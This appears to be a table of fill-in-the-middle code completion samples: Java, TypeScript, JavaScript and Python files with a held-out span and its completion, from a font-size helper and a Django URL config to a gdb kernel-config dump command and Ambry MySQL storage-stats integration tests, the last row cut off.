prompt
large_stringlengths 70
991k
| completion
large_stringlengths 0
1.02k
|
---|---|
<|file_name|>java.beans.EventHandler.d.ts<|end_file_name|><|fim▁begin|>declare namespace java {
namespace beans {
class EventHandler implements java.lang.reflect.InvocationHandler {
public constructor(arg0: java.lang.Object | any, arg1: java.lang.String | string, arg2: java.lang.String | string, arg3: java.lang.String | string)
public getTarget(): java.lang.Object
public getAction(): java.lang.String
public getEventPropertyName(): java.lang.String<|fim▁hole|> public static create<T>(arg0: java.lang.Class<T>, arg1: java.lang.Object | any, arg2: java.lang.String | string, arg3: java.lang.String | string): T
public static create<T>(arg0: java.lang.Class<T>, arg1: java.lang.Object | any, arg2: java.lang.String | string, arg3: java.lang.String | string, arg4: java.lang.String | string): T
}
}
}<|fim▁end|> | public getListenerMethodName(): java.lang.String
public invoke(arg0: java.lang.Object | any, arg1: java.lang.reflect.Method, arg2: java.lang.Object[] | any[]): java.lang.Object
public static create<T>(arg0: java.lang.Class<T>, arg1: java.lang.Object | any, arg2: java.lang.String | string): T |
<|file_name|>multiResolution.js<|end_file_name|><|fim▁begin|>export function getCorrectFontSizeForScreen(PixelRatio, screenWidth, screenHeight, currentFont){
let devRatio = PixelRatio.get();
let factor = (((screenWidth*devRatio)/320)+((screenHeight*devRatio)/640))/2.0;
let maxFontDifferFactor = 5; //the maximum pixels of font size we can go up or down<|fim▁hole|> return currentFont-float2int(maxFontDifferFactor*0.3);
}else if((factor>=1) && (factor<=1.6)){
return currentFont-float2int(maxFontDifferFactor*0.1);
}else if((factor>=1.6) && (factor<=2)){
return currentFont;
}else if((factor>=2) && (factor<=3)){
return currentFont+float2int(maxFontDifferFactor*0.65);
}else if (factor>=3){
return currentFont+float2int(maxFontDifferFactor);
}
}
function float2int (value) {
return value | 0;
}<|fim▁end|> | if(factor<=1){ |
<|file_name|>urls.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
"""CnbetaApi URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')<|fim▁hole|>Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^apis/', include('CnbetaApis.urls')),
]<|fim▁end|> | |
<|file_name|>BuildableTexture.java<|end_file_name|><|fim▁begin|>package org.anddev.andengine.opengl.texture;
import java.util.*;
import org.anddev.andengine.opengl.texture.source.*;
import org.anddev.andengine.util.*;
import org.anddev.andengine.opengl.texture.builder.*;
import android.graphics.*;
public class BuildableTexture extends Texture
{
private final ArrayList<TextureSourceWithWithLocationCallback> mTextureSourcesToPlace;
public BuildableTexture(final int n, final int n2) {
super(n, n2, TextureOptions.DEFAULT, null);
this.mTextureSourcesToPlace = new ArrayList<TextureSourceWithWithLocationCallback>();
}
public BuildableTexture(final int n, final int n2, final ITextureStateListener textureStateListener) {
super(n, n2, TextureOptions.DEFAULT, textureStateListener);
this.mTextureSourcesToPlace = new ArrayList<TextureSourceWithWithLocationCallback>();
}
public BuildableTexture(final int n, final int n2, final TextureOptions textureOptions) throws IllegalArgumentException {
super(n, n2, textureOptions, null);
this.mTextureSourcesToPlace = new ArrayList<TextureSourceWithWithLocationCallback>();
}
public BuildableTexture(final int n, final int n2, final TextureOptions textureOptions, final ITextureStateListener textureStateListener) throws IllegalArgumentException {
super(n, n2, textureOptions, textureStateListener);
this.mTextureSourcesToPlace = new ArrayList<TextureSourceWithWithLocationCallback>();
}
@Deprecated
@Override
public TextureSourceWithLocation addTextureSource(final ITextureSource textureSource, final int n, final int n2) {
return super.addTextureSource(textureSource, n, n2);
}
public void addTextureSource(final ITextureSource textureSource, final Callback<TextureSourceWithLocation> callback) {
this.mTextureSourcesToPlace.add(new TextureSourceWithWithLocationCallback(textureSource, callback));
}
public void build(final ITextureBuilder textureBuilder) throws ITextureBuilder.TextureSourcePackingException {
textureBuilder.pack(this, this.mTextureSourcesToPlace);
this.mTextureSourcesToPlace.clear();
this.mUpdateOnHardwareNeeded = true;
}
@Override
public void clearTextureSources() {
super.clearTextureSources();
this.mTextureSourcesToPlace.clear();
}
public void removeTextureSource(final ITextureSource textureSource) {
final ArrayList<TextureSourceWithWithLocationCallback> mTextureSourcesToPlace = this.mTextureSourcesToPlace;
for (int i = -1 + mTextureSourcesToPlace.size(); i >= 0; --i) {
if (mTextureSourcesToPlace.get(i).mTextureSource == textureSource) {
mTextureSourcesToPlace.remove(i);
this.mUpdateOnHardwareNeeded = true;
return;
}
}
}
public static class TextureSourceWithWithLocationCallback implements ITextureSource
{
private final Callback<TextureSourceWithLocation> mCallback;
private final ITextureSource mTextureSource;
public TextureSourceWithWithLocationCallback(final ITextureSource mTextureSource, final Callback<TextureSourceWithLocation> mCallback) {
super();
this.mTextureSource = mTextureSource;
this.mCallback = mCallback;
}
@Override<|fim▁hole|>
public Callback<TextureSourceWithLocation> getCallback() {
return this.mCallback;
}
@Override
public int getHeight() {
return this.mTextureSource.getHeight();
}
public ITextureSource getTextureSource() {
return this.mTextureSource;
}
@Override
public int getWidth() {
return this.mTextureSource.getWidth();
}
@Override
public Bitmap onLoadBitmap() {
return this.mTextureSource.onLoadBitmap();
}
@Override
public String toString() {
return this.mTextureSource.toString();
}
}
}<|fim▁end|> | public TextureSourceWithWithLocationCallback clone() {
return null;
} |
<|file_name|>VM.java<|end_file_name|><|fim▁begin|>package com.hadroncfy.jphp.jzend;
import com.hadroncfy.jphp.jzend.types.typeInterfaces.Zval;
/**
* Created by cfy on 16-9-1.
*/
public interface VM {
void push(Zval val);
Zval pop();
Zval peek();
void echo(String s);<|fim▁hole|> void jump(int line);
void doBreak(int index);
void doContinue(int index);
Context getEnv();
void beginSilence();
void endSilence();
Zval load(int index);
void store(Zval val,int index);
}<|fim▁end|> | void exit(Zval ret);
void retour(Zval zval);
void doThrow(Zval zval);
void makeError(String msg); |
<|file_name|>config.py<|end_file_name|><|fim▁begin|># SPDX-License-Identifier: GPL-2.0
#
# Copyright 2019 Google LLC.
import gdb
import zlib
from linux import utils
class LxConfigDump(gdb.Command):
"""Output kernel config to the filename specified as the command
argument. Equivalent to 'zcat /proc/config.gz > config.txt' on
a running target"""
def __init__(self):
super(LxConfigDump, self).__init__("lx-configdump", gdb.COMMAND_DATA,
gdb.COMPLETE_FILENAME)
def invoke(self, arg, from_tty):<|fim▁hole|>
try:
py_config_ptr = gdb.parse_and_eval("kernel_config_data + 8")
py_config_size = gdb.parse_and_eval(
"sizeof(kernel_config_data) - 1 - 8 * 2")
except gdb.error as e:
raise gdb.GdbError("Can't find config, enable CONFIG_IKCONFIG?")
inf = gdb.inferiors()[0]
zconfig_buf = utils.read_memoryview(inf, py_config_ptr,
py_config_size).tobytes()
config_buf = zlib.decompress(zconfig_buf, 16)
with open(filename, 'wb') as f:
f.write(config_buf)
gdb.write("Dumped config to " + filename + "\n")
LxConfigDump()<|fim▁end|> | if len(arg) == 0:
filename = "config.txt"
else:
filename = arg |
<|file_name|>GumballMachineTestDrive.java<|end_file_name|><|fim▁begin|>package ProxyPattern;
public class GumballMachineTestDrive {
public static void main(String[] args) {
int count = 0;
if (args .length < 2) {
System.out.println("GumballMachine <name> <inventory>");
System.exit(1);
}<|fim▁hole|> count = Integer.parseInt(args[1]);
GumballMachine gumballMachine = new GumballMachine(args[0], count);
GumballMonitor monitor = new GumballMonitor(gumballMachine);
monitor.report();
}
}<|fim▁end|> | |
<|file_name|>AccountStatsMySqlStoreIntegrationTest.java<|end_file_name|><|fim▁begin|>/**
* Copyright 2020 LinkedIn Corp. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*/
package com.github.ambry.accountstats;
import com.codahale.metrics.MetricRegistry;
import com.github.ambry.config.AccountStatsMySqlConfig;
import com.github.ambry.config.ClusterMapConfig;
import com.github.ambry.config.VerifiableProperties;
import com.github.ambry.server.HostAccountStorageStatsWrapper;
import com.github.ambry.server.HostPartitionClassStorageStatsWrapper;
import com.github.ambry.server.StatsHeader;
import com.github.ambry.server.StatsReportType;
import com.github.ambry.server.StatsSnapshot;
import com.github.ambry.server.StatsWrapper;
import com.github.ambry.server.StorageStatsUtil;
import com.github.ambry.server.StorageStatsUtilTest;
import com.github.ambry.server.storagestats.AggregatedAccountStorageStats;
import com.github.ambry.server.storagestats.AggregatedPartitionClassStorageStats;
import com.github.ambry.server.storagestats.ContainerStorageStats;
import com.github.ambry.server.storagestats.HostAccountStorageStats;
import com.github.ambry.server.storagestats.HostPartitionClassStorageStats;
import com.github.ambry.utils.Pair;
import com.github.ambry.utils.TestUtils;
import com.github.ambry.utils.Utils;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Properties;
import java.util.Random;
import java.util.Set;
import java.util.stream.Collectors;
import org.junit.After;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import static org.junit.Assert.*;
/**
* Integration tests for {@link AccountStatsMySqlStore}.
*/
@RunWith(Parameterized.class)
public class AccountStatsMySqlStoreIntegrationTest {
private static final String clusterName1 = "Ambry-test";
private static final String clusterName2 = "Ambry-random";
// hostname1 and hostname2 are the same, but with different port numbers
private static final String hostname1 = "ambry1.test.github.com";
private static final String hostname2 = "ambry1.test.github.com";
private static final String hostname3 = "ambry3.test.github.com";
private static final int port1 = 12345;
private static final int port2 = 12346;
private static final int port3 = 12347;
private final int batchSize;
private final AccountStatsMySqlStore mySqlStore;
@Parameterized.Parameters
public static List<Object[]> data() {
return Arrays.asList(new Object[][]{{0}, {17}});
}
public AccountStatsMySqlStoreIntegrationTest(int batchSize) throws Exception {
this.batchSize = batchSize;
mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
}
@Before
public void before() throws Exception {
mySqlStore.cleanupTables();
}
@After
public void after() {
mySqlStore.shutdown();
}
/**
* Tests to store multiple stats for multiple hosts and recover stats from database.
* @throws Exception
*/
@Test
public void testMultiStoreStats() throws Exception {
AccountStatsMySqlStore mySqlStore1 = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
AccountStatsMySqlStore mySqlStore2 = createAccountStatsMySqlStore(clusterName1, hostname2, port2);
AccountStatsMySqlStore mySqlStore3 = createAccountStatsMySqlStore(clusterName2, hostname3, port3);
// Generating StatsWrappers, store StatsWrappers and retrieve StatsWrappers
StatsWrapper stats1 = generateStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
StatsWrapper stats2 = generateStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
StatsWrapper stats3 = generateStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
mySqlStore1.storeAccountStats(stats1);
mySqlStore2.storeAccountStats(stats2);
mySqlStore3.storeAccountStats(stats3);
assertTableSize(mySqlStore1, 3 * 10 * 10);
StatsWrapper obtainedStats1 = mySqlStore1.queryAccountStatsByHost(hostname1, port1);
StatsWrapper obtainedStats2 = mySqlStore2.queryAccountStatsByHost(hostname2, port2);
StatsWrapper obtainedStats3 = mySqlStore3.queryAccountStatsByHost(hostname3, port3);
assertTwoStatsSnapshots(obtainedStats1.getSnapshot(), stats1.getSnapshot());
assertTwoStatsSnapshots(obtainedStats2.getSnapshot(), stats2.getSnapshot());
assertTwoStatsSnapshots(obtainedStats3.getSnapshot(), stats3.getSnapshot());
// Generating HostAccountStorageStatsWrappers, store and retrieve them
HostAccountStorageStatsWrapper hostStats1 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
HostAccountStorageStatsWrapper hostStats2 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
HostAccountStorageStatsWrapper hostStats3 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
mySqlStore1.storeHostAccountStorageStats(hostStats1);
mySqlStore2.storeHostAccountStorageStats(hostStats2);
mySqlStore3.storeHostAccountStorageStats(hostStats3);
HostAccountStorageStatsWrapper obtainedHostStats1 =
mySqlStore1.queryHostAccountStorageStatsByHost(hostname1, port1);
HostAccountStorageStatsWrapper obtainedHostStats2 =
mySqlStore2.queryHostAccountStorageStatsByHost(hostname2, port2);
HostAccountStorageStatsWrapper obtainedHostStats3 =
mySqlStore3.queryHostAccountStorageStatsByHost(hostname3, port3);
assertEquals(hostStats1.getStats().getStorageStats(), obtainedHostStats1.getStats().getStorageStats());
assertEquals(hostStats2.getStats().getStorageStats(), obtainedHostStats2.getStats().getStorageStats());
assertEquals(hostStats3.getStats().getStorageStats(), obtainedHostStats3.getStats().getStorageStats());
// Retrieve StatWrappers
obtainedStats1 = mySqlStore1.queryAccountStatsByHost(hostname1, port1);
StatsSnapshot converted =
StorageStatsUtil.convertHostAccountStorageStatsToStatsSnapshot(hostStats1.getStats(), false);
assertTwoStatsSnapshots(converted, obtainedStats1.getSnapshot());
mySqlStore1.shutdown();
mySqlStore2.shutdown();
mySqlStore3.shutdown();
}
@Test
public void testEmptyStatsWhenReadingPreviousStatsFromMysqlDb() throws Exception {
//write a new stats into database.
AccountStatsMySqlStore mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
HostAccountStorageStatsWrapper stats =
generateHostAccountStorageStatsWrapper(1, 1, 1, StatsReportType.ACCOUNT_REPORT);
mySqlStore.storeHostAccountStorageStats(stats);
HostAccountStorageStatsWrapper obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertTrue(obtainedStats.getStats().getStorageStats().containsKey((long) 0));
//initialized the mySqlStore and write a new stats with the same partition.
mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
assertTrue(
mySqlStore.getPreviousHostAccountStorageStatsWrapper().getStats().getStorageStats().containsKey((long) 0));
HostAccountStorageStatsWrapper stats2 =
generateHostAccountStorageStatsWrapper(0, 0, 0, StatsReportType.ACCOUNT_REPORT);
Map<Long, Map<Short, Map<Short, ContainerStorageStats>>> newStorageStats =
new HashMap<>(stats2.getStats().getStorageStats());
newStorageStats.put((long) 0,
new HashMap<>()); // Remove partition 0's storage stats data, this would remove entire partition from database
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats2.getHeader(), new HostAccountStorageStats(newStorageStats)));
// empty stats should remove all the data in the database
obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertFalse(obtainedStats.getStats().getStorageStats().containsKey((long) 0));
}
@Test
public void testEmptyStatsWhenReadingPreviousStatsFromLocalBackUpFile() throws Exception {
AccountStatsMySqlStore mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
HostAccountStorageStatsWrapper stats =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
Map<Long, Map<Short, Map<Short, ContainerStorageStats>>> newStorageStats =
new HashMap<>(stats.getStats().getStorageStats());
newStorageStats.put((long) 10, new HashMap<>());
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats.getHeader(), new HostAccountStorageStats(newStorageStats)));
HostAccountStorageStatsWrapper obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertFalse(obtainedStats.getStats().getStorageStats().containsKey((long) 10));
// Write a new stats with partition 10 still empty
HostAccountStorageStatsWrapper stats2 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
newStorageStats = new HashMap<>(stats.getStats().getStorageStats());
newStorageStats.put((long) 10, new HashMap<>());
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats2.getHeader(), new HostAccountStorageStats(newStorageStats)));
HostAccountStorageStatsWrapper obtainedStats2 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertFalse(obtainedStats2.getStats().getStorageStats().containsKey((long) 10));
// Write a new stats with partition 10 not empty
HostAccountStorageStatsWrapper stats3 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
newStorageStats = new HashMap<>(stats.getStats().getStorageStats());
newStorageStats.put((long) 10, stats.getStats().getStorageStats().get((long) 1));
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats3.getHeader(), new HostAccountStorageStats(newStorageStats)));
HostAccountStorageStatsWrapper obtainedStats3 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertTrue(obtainedStats3.getStats().getStorageStats().containsKey((long) 10));
// Write an empty HostAccountStorageStats
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats3.getHeader(), new HostAccountStorageStats()));
// Empty storage stats should remove all the data in the database
HostAccountStorageStatsWrapper obtainedStats4 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertTrue(obtainedStats4.getStats().getStorageStats().isEmpty());
// Write an empty HostAccountStorageStats again
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats3.getHeader(), new HostAccountStorageStats()));
HostAccountStorageStatsWrapper obtainedStats5 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertTrue(obtainedStats5.getStats().getStorageStats().isEmpty());
HostAccountStorageStatsWrapper stats6 =
generateHostAccountStorageStatsWrapper(20, 20, 20, StatsReportType.ACCOUNT_REPORT);
mySqlStore.storeHostAccountStorageStats(stats6);
HostAccountStorageStatsWrapper obtainedStats6 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(obtainedStats6.getStats().getStorageStats(), stats6.getStats().getStorageStats());
mySqlStore.shutdown();
}
/**
* Test to delete partition, account and container data from database
* @throws Exception
*/
@Test
public void testStatsDeletePartitionAccountContainer() throws Exception {
AccountStatsMySqlStore mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
HostAccountStorageStatsWrapper stats =
generateHostAccountStorageStatsWrapper(10, 10, 10, StatsReportType.ACCOUNT_REPORT);
mySqlStore.storeHostAccountStorageStats(stats);
// Now remove one partition from stats
HostAccountStorageStats storageStatsCopy = new HostAccountStorageStats(stats.getStats());
Map<Long, Map<Short, Map<Short, ContainerStorageStats>>> newStorageStatsMap =
new HashMap<>(storageStatsCopy.getStorageStats());
newStorageStatsMap.remove((long) 1);
HostAccountStorageStatsWrapper stats2 = new HostAccountStorageStatsWrapper(new StatsHeader(stats.getHeader()),
new HostAccountStorageStats(newStorageStatsMap));
mySqlStore.storeHostAccountStorageStats(stats2);
HostAccountStorageStatsWrapper obtainedStats2 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(obtainedStats2.getStats().getStorageStats(), stats2.getStats().getStorageStats());
// Now remove one account from stats
storageStatsCopy = new HostAccountStorageStats(stats2.getStats());
newStorageStatsMap = new HashMap<>(storageStatsCopy.getStorageStats());
newStorageStatsMap.get((long) 3).remove((short) 1);
HostAccountStorageStatsWrapper stats3 = new HostAccountStorageStatsWrapper(new StatsHeader(stats2.getHeader()),
new HostAccountStorageStats(newStorageStatsMap));
mySqlStore.storeHostAccountStorageStats(stats3);
HostAccountStorageStatsWrapper obtainedStats3 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(obtainedStats3.getStats().getStorageStats(), stats3.getStats().getStorageStats());
// Now remove some containers
storageStatsCopy = new HostAccountStorageStats(stats3.getStats());
newStorageStatsMap = new HashMap<>(storageStatsCopy.getStorageStats());
for (short containerId : new short[]{0, 1, 2}) {
newStorageStatsMap.get((long) 3).get((short) 3).remove(containerId);
}
HostAccountStorageStatsWrapper stats4 = new HostAccountStorageStatsWrapper(new StatsHeader(stats3.getHeader()),
new HostAccountStorageStats(newStorageStatsMap));
mySqlStore.storeHostAccountStorageStats(stats4);
HostAccountStorageStatsWrapper obtainedStats4 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(obtainedStats4.getStats().getStorageStats(), stats4.getStats().getStorageStats());
// Now write the stats back
stats = generateHostAccountStorageStatsWrapper(10, 10, 10, StatsReportType.ACCOUNT_REPORT);
mySqlStore.storeHostAccountStorageStats(stats);
HostAccountStorageStatsWrapper obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(stats.getStats().getStorageStats(), obtainedStats.getStats().getStorageStats());
mySqlStore.shutdown();
}
/**
* Tests to store multiple stats for one hosts and recover stats from database.
* @throws Exception
*/
@Test
public void testStoreMultilpleWrites() throws Exception {
AccountStatsMySqlStore mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
HostAccountStorageStatsWrapper stats1 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
mySqlStore.storeHostAccountStorageStats(stats1);
HostAccountStorageStats hostAccountStorageStatsCopy = new HostAccountStorageStats(stats1.getStats());
Map<Long, Map<Short, Map<Short, ContainerStorageStats>>> newStorageStats =
new HashMap<>(hostAccountStorageStatsCopy.getStorageStats());
ContainerStorageStats origin = newStorageStats.get((long) 0).get((short) 0).get((short) 0);
newStorageStats.get((long) 0)
.get((short) 0)
.put((short) 0,
new ContainerStorageStats.Builder(origin).logicalStorageUsage(origin.getLogicalStorageUsage() + 1).build());
HostAccountStorageStatsWrapper stats2 = new HostAccountStorageStatsWrapper(new StatsHeader(stats1.getHeader()),
new HostAccountStorageStats(newStorageStats));
mySqlStore.storeHostAccountStorageStats(stats2);
HostAccountStorageStatsWrapper obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(stats2.getStats().getStorageStats(), obtainedStats.getStats().getStorageStats());
hostAccountStorageStatsCopy = new HostAccountStorageStats(stats1.getStats());
newStorageStats = new HashMap<>(hostAccountStorageStatsCopy.getStorageStats());
origin = newStorageStats.get((long) 0).get((short) 0).get((short) 0);
newStorageStats.get((long) 0)
.get((short) 0)
.put((short) 0,
new ContainerStorageStats.Builder(origin).physicalStorageUsage(origin.getPhysicalStorageUsage() + 1)
.build());
HostAccountStorageStatsWrapper stats3 = new HostAccountStorageStatsWrapper(new StatsHeader(stats1.getHeader()),
new HostAccountStorageStats(newStorageStats));
mySqlStore.storeHostAccountStorageStats(stats3);
obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(stats3.getStats().getStorageStats(), obtainedStats.getStats().getStorageStats());
hostAccountStorageStatsCopy = new HostAccountStorageStats(stats1.getStats());
newStorageStats = new HashMap<>(hostAccountStorageStatsCopy.getStorageStats());
origin = newStorageStats.get((long) 0).get((short) 0).get((short) 0);
newStorageStats.get((long) 0)
.get((short) 0)
.put((short) 0, new ContainerStorageStats.Builder(origin).numberOfBlobs(origin.getNumberOfBlobs() + 1).build());
HostAccountStorageStatsWrapper stats4 = new HostAccountStorageStatsWrapper(new StatsHeader(stats1.getHeader()),
new HostAccountStorageStats(newStorageStats));
mySqlStore.storeHostAccountStorageStats(stats4);
obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(stats4.getStats().getStorageStats(), obtainedStats.getStats().getStorageStats());
mySqlStore.shutdown();
}
/**
* Test the methods for storing, deleting and fetch aggregated account stats.
* @throws Exception
*/
@Test
public void testAggregatedAccountStats() throws Exception {
Map<String, Map<String, Long>> containerStorageUsages = TestUtils.makeStorageMap(10, 10, 100000, 1000);
StatsSnapshot snapshot = TestUtils.makeAccountStatsSnapshotFromContainerStorageMap(containerStorageUsages);
mySqlStore.storeAggregatedAccountStats(snapshot);
Map<String, Map<String, Long>> obtainedContainerStorageUsages = mySqlStore.queryAggregatedAccountStats(false);
assertEquals(containerStorageUsages, obtainedContainerStorageUsages);
StatsSnapshot obtainedSnapshot = mySqlStore.queryAggregatedAccountStatsByClusterName(clusterName1);
assertEquals(snapshot, obtainedSnapshot);
// Fetching aggregated account stats for clustername2 should result in empty stats
assertEquals(mySqlStore.queryAggregatedAccountStatsByClusterName(clusterName2).getSubMap().size(), 0);
// Change one value and store it to mysql database again
StatsSnapshot newSnapshot = new StatsSnapshot(snapshot);
newSnapshot.getSubMap()
.get(Utils.statsAccountKey((short) 1))
.getSubMap()
.get(Utils.statsContainerKey((short) 1))
.setValue(1);
newSnapshot.updateValue();
containerStorageUsages.get("1").put("1", 1L);
mySqlStore.storeAggregatedAccountStats(newSnapshot);
obtainedContainerStorageUsages = mySqlStore.queryAggregatedAccountStats(false);
assertEquals(containerStorageUsages, obtainedContainerStorageUsages);
// Delete account and container
newSnapshot = new StatsSnapshot(newSnapshot);
newSnapshot.getSubMap().remove(Utils.statsAccountKey((short) 1));
newSnapshot.getSubMap()
.get(Utils.statsAccountKey((short) 2))
.getSubMap()
.remove(Utils.statsContainerKey((short) 1));
newSnapshot.updateValue();
// Now remove all containers for account 1 and container 1 of account 2
for (String containerId : containerStorageUsages.get(String.valueOf(1)).keySet()) {
mySqlStore.deleteAggregatedAccountStatsForContainer((short) 1, Short.valueOf(containerId));
}
mySqlStore.deleteAggregatedAccountStatsForContainer((short) 2, (short) 1);
obtainedSnapshot = mySqlStore.queryAggregatedAccountStatsByClusterName(clusterName1);
assertEquals(newSnapshot, obtainedSnapshot);
mySqlStore.shutdown();
}
/**
* Test the methods for storing, deleting and fetch aggregated account storage stats.
* @throws Exception
*/
@Test
public void testAggregatedAccountStorageStats() throws Exception {
AggregatedAccountStorageStats aggregatedAccountStorageStats = new AggregatedAccountStorageStats(
StorageStatsUtilTest.generateRandomAggregatedAccountStorageStats((short) 0, 10, 10, 10000L, 2, 10));
mySqlStore.storeAggregatedAccountStorageStats(aggregatedAccountStorageStats);
// Compare container usage map
Map<String, Map<String, Long>> obtainedContainerStorageUsages = mySqlStore.queryAggregatedAccountStats(false);
assertEquals(StorageStatsUtil.convertAggregatedAccountStorageStatsToMap(aggregatedAccountStorageStats, false),
obtainedContainerStorageUsages);
// Compare StatsSnapshot
StatsSnapshot obtainedSnapshot = mySqlStore.queryAggregatedAccountStatsByClusterName(clusterName1);
assertEquals(
StorageStatsUtil.convertAggregatedAccountStorageStatsToStatsSnapshot(aggregatedAccountStorageStats, false),
obtainedSnapshot);
// Compare AggregatedAccountStorageStats
AggregatedAccountStorageStats obtainedStats = mySqlStore.queryAggregatedAccountStorageStats();
assertEquals(aggregatedAccountStorageStats.getStorageStats(), obtainedStats.getStorageStats());
obtainedStats = mySqlStore.queryAggregatedAccountStorageStatsByClusterName(clusterName1);
assertEquals(aggregatedAccountStorageStats.getStorageStats(), obtainedStats.getStorageStats());
// Fetching aggregated account stats for clustername2 should result in a null;
assertEquals(mySqlStore.queryAggregatedAccountStatsByClusterName(clusterName2).getSubMap().size(), 0);
assertEquals(mySqlStore.queryAggregatedAccountStorageStatsByClusterName(clusterName2).getStorageStats().size(), 0);
// Change one value and store it to mysql database again
Map<Short, Map<Short, ContainerStorageStats>> newStorageStatsMap =
new HashMap<>(aggregatedAccountStorageStats.getStorageStats());
ContainerStorageStats origin = newStorageStatsMap.get((short) 1).get((short) 1);
newStorageStatsMap.get((short) 1)
.put((short) 1,
new ContainerStorageStats.Builder(origin).logicalStorageUsage(origin.getLogicalStorageUsage() + 1).build());
aggregatedAccountStorageStats = new AggregatedAccountStorageStats(newStorageStatsMap);
mySqlStore.storeAggregatedAccountStorageStats(aggregatedAccountStorageStats);
obtainedStats = mySqlStore.queryAggregatedAccountStorageStats();
assertEquals(newStorageStatsMap, obtainedStats.getStorageStats());
// Delete account and container
newStorageStatsMap = new HashMap<>(aggregatedAccountStorageStats.getStorageStats());
newStorageStatsMap.remove((short) 1);
newStorageStatsMap.get((short) 2).remove((short) 1);
// Now remove all containers for account 1 and container 1 of account 2
for (short containerId : aggregatedAccountStorageStats.getStorageStats().get((short) 1).keySet()) {
mySqlStore.deleteAggregatedAccountStatsForContainer((short) 1, containerId);
}
mySqlStore.deleteAggregatedAccountStatsForContainer((short) 2, (short) 1);
obtainedStats = mySqlStore.queryAggregatedAccountStorageStatsByClusterName(clusterName1);
assertEquals(newStorageStatsMap, obtainedStats.getStorageStats());
mySqlStore.shutdown();
}
/**
* Test methods to store, delete and fetch monthly aggregated stats
* @throws Exception
*/
@Test
public void testMonthlyAggregatedStats() throws Exception {
String monthValue = "2020-01";
AggregatedAccountStorageStats currentAggregatedStats = mySqlStore.queryAggregatedAccountStorageStats();
if (currentAggregatedStats.getStorageStats().size() == 0) {
AggregatedAccountStorageStats aggregatedAccountStorageStats = new AggregatedAccountStorageStats(
StorageStatsUtilTest.generateRandomAggregatedAccountStorageStats((short) 0, 10, 10, 10000L, 2, 10));
mySqlStore.storeAggregatedAccountStorageStats(aggregatedAccountStorageStats);
currentAggregatedStats = mySqlStore.queryAggregatedAccountStorageStats();
}
// fetch the month and it should return emtpy string
Assert.assertEquals("", mySqlStore.queryRecordedMonth());
mySqlStore.takeSnapshotOfAggregatedAccountStatsAndUpdateMonth(monthValue);
